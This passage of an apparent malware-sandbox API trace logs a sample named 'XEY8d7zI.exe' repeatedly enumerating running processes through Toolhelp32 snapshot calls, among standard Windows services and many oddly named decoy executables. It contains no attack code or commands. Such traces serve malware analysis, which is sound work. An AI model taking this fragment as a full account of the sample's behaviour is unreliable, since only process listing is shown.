dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.680] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0103.681] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.681] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0103.682] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0103.683] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0103.683] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0103.684] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.685] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.685] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.686] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.687] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.687] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0103.688] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.689] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.689] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0103.690] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.692] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.693] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0103.694] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0103.695] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0103.696] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.697] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.698] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0103.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0103.701] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0103.702] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0103.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0103.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0103.753] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0103.754] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0103.755] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0103.756] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0103.757] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0103.758] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0103.759] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0103.760] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0103.761] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0103.763] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 
[0103.764] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0103.765] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0103.766] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0103.767] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0103.768] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.769] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0103.770] CloseHandle (hObject=0xc4) returned 1 [0103.770] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0103.774] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0103.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0103.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.777] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0103.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0103.779] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0103.779] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0103.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0103.781] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.783] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.831] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0103.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.834] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0103.835] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.836] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.837] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0103.838] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0103.839] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0103.840] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.842] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.843] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0103.844] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0103.845] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0103.846] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0103.847] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0103.849] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0103.850] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0103.851] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0103.852] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0103.853] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0103.854] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0103.855] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) 